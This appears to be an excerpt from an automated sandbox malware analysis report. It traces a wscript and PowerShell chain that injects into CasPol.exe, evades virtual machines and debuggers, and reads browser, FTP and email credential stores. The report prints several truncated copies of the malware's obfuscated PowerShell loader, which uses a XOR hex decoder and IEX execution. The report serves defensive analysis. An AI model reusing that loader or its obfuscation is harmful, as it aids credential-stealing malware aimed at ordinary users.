          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9239
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 730
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe System information queried: ModuleInformation
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000007.00000002.6648567310.0000000001090000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU%
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB5B8 LdrInitializeThunk,7_2_00CDB5B8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 
'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br 
no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0mJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 
'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br 
No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 
'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match; File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
